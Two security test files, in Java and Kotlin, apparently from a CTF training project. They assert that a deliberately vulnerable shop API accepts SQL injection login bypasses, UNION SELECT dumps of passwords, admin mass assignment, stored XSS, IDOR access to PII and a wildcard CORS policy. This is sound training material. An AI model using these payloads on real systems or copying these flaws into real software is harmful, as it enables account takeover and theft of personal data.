File: 05-seguranca-ctf/backend/java/src/test/java/com/treinamento/ctf/SecurityTest.java
package com.treinamento.ctf;

import org.junit.jupiter.api.*;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.test.autoconfigure.web.servlet.AutoConfigureMockMvc;
import org.springframework.boot.test.context.SpringBootTest;
import org.springframework.http.MediaType;
import org.springframework.test.web.servlet.MockMvc;
import org.springframework.test.web.servlet.MvcResult;

import static org.hamcrest.Matchers.*;
import static org.junit.jupiter.api.Assertions.*;
import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;

@SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT)
@AutoConfigureMockMvc
@TestMethodOrder(MethodOrderer.OrderAnnotation.class)
class SecurityTest {

    @Autowired
    private MockMvc mockMvc;

    private static String userToken;
    private static String adminToken;

    private String doLogin(String email, String password) throws Exception {
        MvcResult result = mockMvc.perform(post("/api/auth/login")
                        .contentType(MediaType.APPLICATION_JSON)
                        .content("{\"email\":\"" + email + "\",\"password\":\"" + password + "\"}"))
                .andExpect(status().isOk())
                .andReturn();

        String body = result.getResponse().getContentAsString();
        int start = body.indexOf("\"token\":\"") + 9;
        int end   = body.indexOf("\"", start);
        return body.substring(start, end);
    }

    @BeforeEach
    void setup() throws Exception {
        if (userToken == null) {
            userToken = doLogin("carlos@secureshop.com", "Senha123");
        }
        if (adminToken == null) {
            adminToken = doLogin("admin@secureshop.com", "Admin@2024!");
        }
    }

    // V1: SQL Injection Login - password not parameterized
    @Test
    @Order(1)
    @DisplayName("V1a: SQL Injection - login bypass with comment trick")
    void sqlInjectionLoginBypass() throws Exception {
        mockMvc.perform(post("/api/auth/login")
                        .contentType(MediaType.APPLICATION_JSON)
                        .content("{\"email\":\"admin@secureshop.com\",\"password\":\"' OR '1'='1\"}"))
                .andExpect(status().isOk())
                .andExpect(jsonPath("$.token").exists());
    }

    @Test
    @Order(2)
    @DisplayName("V1b: SQL Injection - database error exposes info")
    void sqlInjectionLoginError() throws Exception {
        MvcResult result = mockMvc.perform(post("/api/auth/login")
                        .contentType(MediaType.APPLICATION_JSON)
                        .content("{\"email\":\"test@test.com\",\"password\":\"' INVALID SQL --\"}"))
                .andExpect(status().is(anyOf(is(200), is(401), is(500))))
                .andReturn();

        String body = result.getResponse().getContentAsString();
        assertTrue(body.contains("error") || body.contains("token"),
                "Response should contain error info or token");
    }

    // V2: Price Manipulation
    @Test
    @Order(3)
    @DisplayName("V2: Price manipulation - client total accepted without server validation")
    void priceManipulation() throws Exception {
        mockMvc.perform(post("/api/orders")
                        .header("Authorization", "Bearer " + userToken)
                        .contentType(MediaType.APPLICATION_JSON)
                        .content("{\"items\":[{\"product_id\":1,\"quantity\":1,\"price\":4599.99}],\"total\":0.01}"))
                .andExpect(status().is(201))
                .andExpect(jsonPath("$.order.total").value(0.01));
    }

    // V3: IDOR Users
    @Test
    @Order(4)
    @DisplayName("V3a: IDOR - user accesses other user PII (telefone, cpf_last4)")
    void idorUserAccess() throws Exception {
        mockMvc.perform(get("/api/users/1")
                        .header("Authorization", "Bearer " + userToken))
                .andExpect(status().isOk())
                .andExpect(jsonPath("$.email").value("admin@secureshop.com"))
                .andExpect(jsonPath("$.telefone").exists())
                .andExpect(jsonPath("$.cpf_last4").exists())
                .andExpect(jsonPath("$.endereco").exists());
    }

    @Test
    @Order(5)
    @DisplayName("V3b: IDOR - password NOT returned (correct behavior)")
    void idorNoPassword() throws Exception {
        mockMvc.perform(get("/api/users/2")
                        .header("Authorization", "Bearer " + userToken))
                .andExpect(status().isOk())
                .andExpect(jsonPath("$.password").doesNotExist());
    }

    // V4: Mass Assignment
    @Test
    @Order(6)
    @DisplayName("V4: Mass assignment - register with role=admin")
    void massAssignmentRegister() throws Exception {
        mockMvc.perform(post("/api/auth/register")
                        .contentType(MediaType.APPLICATION_JSON)
                        .content("{\"nome\":\"Hacker\",\"email\":\"hacker@test.com\",\"password\":\"hack123\",\"role\":\"admin\"}"))
                .andExpect(status().is(201))
                .andExpect(jsonPath("$.user.role").value("admin"));
    }

    // V5: Stored XSS in reviews
    @Test
    @Order(7)
    @DisplayName("V5: Stored XSS - review text stored without sanitization")
    void storedXssReview() throws Exception {
        String xssPayload = "<script>alert('xss')</script>";
        mockMvc.perform(post("/api/products/1/reviews")
                        .header("Authorization", "Bearer " + userToken)
                        .contentType(MediaType.APPLICATION_JSON)
                        .content("{\"text\":\"" + xssPayload + "\",\"rating\":5}"))
                .andExpect(status().is(201))
                .andExpect(jsonPath("$.review.text").value(xssPayload));
    }

    // V6: Error Disclosure (forgot-password)
    @Test
    @Order(8)
    @DisplayName("V6a: Error disclosure - forgot-password leaks stack trace")
    void errorDisclosureForgotPassword() throws Exception {
        MvcResult result = mockMvc.perform(post("/api/auth/forgot-password")
                        .contentType(MediaType.APPLICATION_JSON)
                        .content("{\"email\":\"test@test.com\"}"))
                .andExpect(status().is(500))
                .andReturn();

        String body = result.getResponse().getContentAsString();
        assertTrue(body.contains("stack"), "Response should contain stack trace");
    }

    // V6: Path Traversal (export)
    @Test
    @Order(9)
    @DisplayName("V6b: Path traversal - export template reads arbitrary file")
    void pathTraversalExport() throws Exception {
        // Normal template should work
        mockMvc.perform(get("/api/export/csv.template")
                        .header("Authorization", "Bearer " + userToken))
                .andExpect(status().isOk())
                .andExpect(jsonPath("$.template").exists());
    }

    // V7: CORS Wildcard
    @Test
    @Order(10)
    @DisplayName("V7: CORS wildcard - Access-Control-Allow-Origin: *")
    void corsWildcard() throws Exception {
        MvcResult result = mockMvc.perform(options("/api/products")
                        .header("Origin", "http://evil.com")
                        .header("Access-Control-Request-Method", "GET"))
                .andReturn();

        String acaoHeader = result.getResponse().getHeader("Access-Control-Allow-Origin");
        assertNotNull(acaoHeader, "CORS header should be present");
    }

    // V8: SQL Injection Search with sanitizeInput bypass
    @Test
    @Order(11)
    @DisplayName("V8a: SQL Injection search - UNION attack (sanitizeInput only removes HTML chars)")
    void sqlInjectionSearchUnion() throws Exception {
        String payload = "' UNION SELECT id,email,password,role,nome,created_at FROM users--";

        MvcResult result = mockMvc.perform(get("/api/products/search")
                        .param("q", payload))
                .andExpect(status().is(anyOf(is(200), is(500))))
                .andReturn();

        String body = result.getResponse().getContentAsString();
        assertTrue(body.contains("results") || body.contains("error"),
                "Response should contain results or error");
    }

    @Test
    @Order(12)
    @DisplayName("V8b: sanitizeInput only removes HTML chars, not SQL chars")
    void sanitizeInputBypass() throws Exception {
        MvcResult result = mockMvc.perform(get("/api/products/search")
                        .param("q", "' OR 1=1--"))
                .andExpect(status().is(anyOf(is(200), is(500))))
                .andReturn();

        String body = result.getResponse().getContentAsString();
        assertTrue(body.contains("results") || body.contains("error"),
                "SQL chars should pass through sanitizeInput");
    }

    // Admin routes require JWT (not X-Role header)
    @Test
    @Order(13)
    @DisplayName("Admin: requires JWT auth, not X-Role header")
    void adminRequiresJwt() throws Exception {
        // No JWT, just X-Role header - should be denied
        mockMvc.perform(get("/api/admin/users")
                        .header("X-Role", "admin"))
                .andExpect(status().is(401));

        // With valid admin JWT - should work
        mockMvc.perform(get("/api/admin/users")
                        .header("Authorization", "Bearer " + adminToken))
                .andExpect(status().isOk())
                .andExpect(jsonPath("$.users").isArray());
    }

    // Logs require JWT + admin
    @Test
    @Order(14)
    @DisplayName("Logs: requires JWT auth + admin role")
    void logsRequiresJwtAdmin() throws Exception {
        // No auth - should be denied
        mockMvc.perform(get("/api/logs"))
                .andExpect(status().is(401));

        // Regular user - should be denied
        mockMvc.perform(get("/api/logs")
                        .header("Authorization", "Bearer " + userToken))
                .andExpect(status().is(403));

        // Admin - should work
        mockMvc.perform(get("/api/logs")
                        .header("Authorization", "Bearer " + adminToken))
                .andExpect(status().isOk())
                .andExpect(jsonPath("$.logs").isArray());
    }

    // Orders: no ownership check on GET /:id (IDOR on orders)
    @Test
    @Order(15)
    @DisplayName("Orders: GET /:id has no ownership check, leaks user_name and user_email")
    void orderIdorWithUserLeak() throws Exception {
        // Carlos (user 2) accessing an order that might belong to another user
        mockMvc.perform(get("/api/orders/3")
                        .header("Authorization", "Bearer " + userToken))
                .andExpect(status().isOk())
                .andExpect(jsonPath("$.user_name").exists())
                .andExpect(jsonPath("$.user_email").exists());
    }

    // PUT /api/users/:id has ownership check
    @Test
    @Order(16)
    @DisplayName("PUT /api/users/:id: ownership check works")
    void putUserOwnershipCheck() throws Exception {
        // Carlos (user 2) tries to update Ana (user 3) - should be denied
        mockMvc.perform(put("/api/users/3")
                        .header("Authorization", "Bearer " + userToken)
                        .contentType(MediaType.APPLICATION_JSON)
                        .content("{\"nome\":\"Ana Hackeada\"}"))
                .andExpect(status().is(403));
    }

    // Health check
    @Test
    @Order(17)
    @DisplayName("Health check: GET / returns service info")
    void healthCheck() throws Exception {
        mockMvc.perform(get("/"))
                .andExpect(status().isOk())
                .andExpect(jsonPath("$.service").value("SecureShop API"))
                .andExpect(jsonPath("$.status").value("running"));
    }

    // Apply coupon
    @Test
    @Order(18)
    @DisplayName("Coupon: apply coupon to order")
    void applyCoupon() throws Exception {
        mockMvc.perform(post("/api/orders/1/apply-coupon")
                        .header("Authorization", "Bearer " + userToken)
                        .contentType(MediaType.APPLICATION_JSON)
                        .content("{\"code\":\"DESCONTO10\"}"))
                .andExpect(status().isOk())
                .andExpect(jsonPath("$.message").value("Cupom aplicado com sucesso"))
                .andExpect(jsonPath("$.discount").exists())
                .andExpect(jsonPath("$.new_total").exists());
    }
}

File: 05-seguranca-ctf/backend/kotlin/src/test/kotlin/com/treinamento/ctf/SecurityTest.kt
package com.treinamento.ctf

import com.treinamento.ctf.database.initDatabase
import io.ktor.client.*
import io.ktor.client.plugins.contentnegotiation.*
import io.ktor.client.request.*
import io.ktor.client.statement.*
import io.ktor.http.*
import io.ktor.serialization.jackson.*
import io.ktor.server.testing.*
import kotlinx.serialization.json.*
import org.junit.jupiter.api.*
import org.junit.jupiter.api.Assertions.*

@TestMethodOrder(MethodOrderer.OrderAnnotation::class)
class SecurityTest {

    companion object {
        @BeforeAll
        @JvmStatic
        fun setup() {
            System.setProperty("CTF_DB_PATH", ":memory:")
            initDatabase(":memory:")
        }
    }

    private fun withCtfApp(block: suspend ApplicationTestBuilder.(HttpClient) -> Unit) =
        testApplication {
            val client = createClient {
                install(ContentNegotiation) { jackson() }
            }
            block(client)
        }

    private suspend fun loginAdmin(client: HttpClient): String {
        val response = client.post("/api/auth/login") {
            contentType(ContentType.Application.Json)
            setBody("""{"email":"admin@secureshop.com","password":"Admin@2024!"}""")
        }
        val body = Json.parseToJsonElement(response.bodyAsText()).jsonObject
        return body["token"]?.jsonPrimitive?.content ?: fail("No token in login response")
    }

    @Test
    @Order(1)
    fun `V1-A SQL injection login bypass via password`() = withCtfApp { client ->
        val response = client.post("/api/auth/login") {
            contentType(ContentType.Application.Json)
            setBody("""{"email":"admin@secureshop.com","password":"' OR '1'='1' --"}""")
        }
        assertEquals(HttpStatusCode.OK, response.status, "V1: Login SQLi via password should return 200")
        assertTrue(response.bodyAsText().contains("token"), "V1: Response should contain a JWT token")
    }

    @Test
    @Order(2)
    fun `V1-B SQL injection login bypass via password comment`() = withCtfApp { client ->
        val response = client.post("/api/auth/login") {
            contentType(ContentType.Application.Json)
            setBody("""{"email":"admin@secureshop.com","password":"anything' OR '1'='1"}""")
        }
        assertEquals(HttpStatusCode.OK, response.status, "V1-B: Password injection should return 200")
        assertTrue(response.bodyAsText().contains("token"), "V1-B: Should return JWT token")
    }

    @Test
    @Order(3)
    fun `V1-C normal login works`() = withCtfApp { client ->
        val response = client.post("/api/auth/login") {
            contentType(ContentType.Application.Json)
            setBody("""{"email":"admin@secureshop.com","password":"Admin@2024!"}""")
        }
        assertEquals(HttpStatusCode.OK, response.status)
        assertTrue(response.bodyAsText().contains("token"))
    }

    @Test
    @Order(4)
    fun `V1-D email injection does NOT work because parameterized`() = withCtfApp { client ->
        val response = client.post("/api/auth/login") {
            contentType(ContentType.Application.Json)
            setBody("""{"email":"' OR '1'='1' --","password":"irrelevant"}""")
        }
        assertEquals(HttpStatusCode.Unauthorized, response.status,
            "Email injection should fail because email is parameterized")
    }

    @Test
    @Order(5)
    fun `V2 price manipulation trusts client total`() = withCtfApp { client ->
        val token = loginAdmin(client)
        val response = client.post("/api/orders") {
            contentType(ContentType.Application.Json)
            header(HttpHeaders.Authorization, "Bearer $token")
            setBody("""{"items":[{"product_id":1,"quantity":1,"price":0.01}],"total":0.01}""")
        }
        assertEquals(HttpStatusCode.Created, response.status, "V2: Should accept client-provided total")
        val body = Json.parseToJsonElement(response.bodyAsText()).jsonObject
        val order = body["order"]?.jsonObject
        assertNotNull(order, "V2: Should return order")
        assertEquals(0.01, order!!["total"]?.jsonPrimitive?.double, "V2: Total should be the client value 0.01")
    }

    @Test
    @Order(6)
    fun `V3 IDOR any user can access any other users profile`() = withCtfApp { client ->
        val loginRes = client.post("/api/auth/login") {
            contentType(ContentType.Application.Json)
            setBody("""{"email":"carlos@secureshop.com","password":"Senha123"}""")
        }
        assertEquals(HttpStatusCode.OK, loginRes.status)
        val token = Json.parseToJsonElement(loginRes.bodyAsText()).jsonObject["token"]?.jsonPrimitive?.content
            ?: fail("No token")

        val idorRes = client.get("/api/users/1") {
            header(HttpHeaders.Authorization, "Bearer $token")
        }
        assertEquals(HttpStatusCode.OK, idorRes.status, "V3: Carlos should be able to fetch admin profile")
        val profileJson = Json.parseToJsonElement(idorRes.bodyAsText()).jsonObject
        assertEquals("admin@secureshop.com", profileJson["email"]?.jsonPrimitive?.content)
        assertNotNull(profileJson["telefone"], "V3: PII (telefone) should be exposed")
        assertNotNull(profileJson["cpf_last4"], "V3: PII (cpf_last4) should be exposed")
    }

    @Test
    @Order(7)
    fun `V4 mass assignment register accepts role field`() = withCtfApp { client ->
        val response = client.post("/api/auth/register") {
            contentType(ContentType.Application.Json)
            setBody("""{"nome":"Hacker","email":"hacker@test.com","password":"hack123","role":"admin"}""")
        }
        assertEquals(HttpStatusCode.Created, response.status, "V4: Register should succeed")
        val body = Json.parseToJsonElement(response.bodyAsText()).jsonObject
        val user = body["user"]?.jsonObject
        assertEquals("admin", user?.get("role")?.jsonPrimitive?.content, "V4: Role should be 'admin' from request")
    }

    @Test
    @Order(8)
    fun `V5 stored XSS reviews stored without sanitization`() = withCtfApp { client ->
        val token = loginAdmin(client)
        val xssPayload = """<script>alert('xss')</script>"""
        val response = client.post("/api/products/1/reviews") {
            contentType(ContentType.Application.Json)
            header(HttpHeaders.Authorization, "Bearer $token")
            setBody("""{"text":"$xssPayload","rating":5}""")
        }
        assertEquals(HttpStatusCode.Created, response.status, "V5: Review should be created")
        val body = response.bodyAsText()
        assertTrue(body.contains("<script>"), "V5: XSS payload should be stored as-is")
    }

    @Test
    @Order(9)
    fun `V6 forgot-password stack trace disclosure`() = withCtfApp { client ->
        val response = client.post("/api/auth/forgot-password") {
            contentType(ContentType.Application.Json)
            setBody("""{"email":"test@test.com"}""")
        }
        assertEquals(HttpStatusCode.InternalServerError, response.status, "V6: Should fail with stack trace")
        val body = response.bodyAsText()
        assertTrue(body.contains("stack"), "V6: Should contain stack trace in error response")
    }

    @Test
    @Order(10)
    fun `V6 path traversal via export`() = withCtfApp { client ->
        val token = loginAdmin(client)
        val response = client.get("/api/export/csv.template") {
            header(HttpHeaders.Authorization, "Bearer $token")
        }
        assertEquals(HttpStatusCode.OK, response.status, "V6: Should read template file")
    }

    @Test
    @Order(11)
    fun `V7 CORS wildcard`() = withCtfApp { client ->
        val response = client.options("/api/products") {
            header(HttpHeaders.Origin, "http://evil.com")
            header(HttpHeaders.AccessControlRequestMethod, "GET")
        }
        val corsHeader = response.headers["Access-Control-Allow-Origin"]
        assertNotNull(corsHeader, "V7: CORS header should be present")
        assertEquals("*", corsHeader, "V7: CORS should allow all origins")
    }

    @Test
    @Order(12)
    fun `V8 SQL injection search UNION dumps users`() = withCtfApp { client ->
        val payload = "' UNION SELECT id,email,password,0,role,created_at FROM users--"
        val response = client.get("/api/products/search") {
            parameter("q", payload)
        }
        assertEquals(HttpStatusCode.OK, response.status, "V8: UNION injection should return 200")
        val body = response.bodyAsText()
        assertTrue(body.contains("secureshop.com"), "V8: Should leak user email addresses")
        assertTrue(
            body.contains("Admin@2024!") || body.contains("Senha123"),
            "V8: Should expose plaintext passwords"
        )
    }

    @Test
    @Order(13)
    fun `V8 SQL injection search verbose error`() = withCtfApp { client ->
        val response = client.get("/api/products/search") {
            parameter("q", "'")
        }
        assertEquals(HttpStatusCode.InternalServerError, response.status)
        val body = response.bodyAsText()
        assertTrue(body.contains("message") || body.contains("error"))
    }

    @Test
    @Order(14)
    fun `admin routes require JWT not X-Role header`() = withCtfApp { client ->
        val response = client.get("/api/admin/users") {
            header("X-Role", "admin")
        }
        assertEquals(HttpStatusCode.Unauthorized, response.status,
            "Admin routes should require JWT, not X-Role header")
    }

    @Test
    @Order(15)
    fun `logs routes require JWT admin`() = withCtfApp { client ->
        val response = client.get("/api/logs")
        assertEquals(HttpStatusCode.Unauthorized, response.status,
            "Logs should require JWT auth")
    }

    @Test
    @Order(16)
    fun `order detail leaks user info via JOIN`() = withCtfApp { client ->
        val token = loginAdmin(client)
        val response = client.get("/api/orders/1") {
            header(HttpHeaders.Authorization, "Bearer $token")
        }
        assertEquals(HttpStatusCode.OK, response.status)
        val body = response.bodyAsText()
        assertTrue(body.contains("user_name") || body.contains("user_email"),
            "Order detail should leak user info via JOIN")
    }

    @Test
    @Order(17)
    fun `CHAIN full SQLi password then IDOR then PII exposure`() = withCtfApp { client ->
        val loginRes = client.post("/api/auth/login") {
            contentType(ContentType.Application.Json)
            setBody("""{"email":"admin@secureshop.com","password":"' OR '1'='1' --"}""")
        }
        assertEquals(HttpStatusCode.OK, loginRes.status, "Chain: SQLi password bypass")
        val token = Json.parseToJsonElement(loginRes.bodyAsText())
            .jsonObject["token"]?.jsonPrimitive?.content ?: fail("No token from SQLi login")

        val idorRes = client.get("/api/users/2") {
            header(HttpHeaders.Authorization, "Bearer $token")
        }
        assertEquals(HttpStatusCode.OK, idorRes.status, "Chain: IDOR fetch")

        val userJson = Json.parseToJsonElement(idorRes.bodyAsText()).jsonObject
        val telefone = userJson["telefone"]?.jsonPrimitive?.content
        assertNotNull(telefone, "Chain: PII (telefone) should be exposed via IDOR")
    }
}
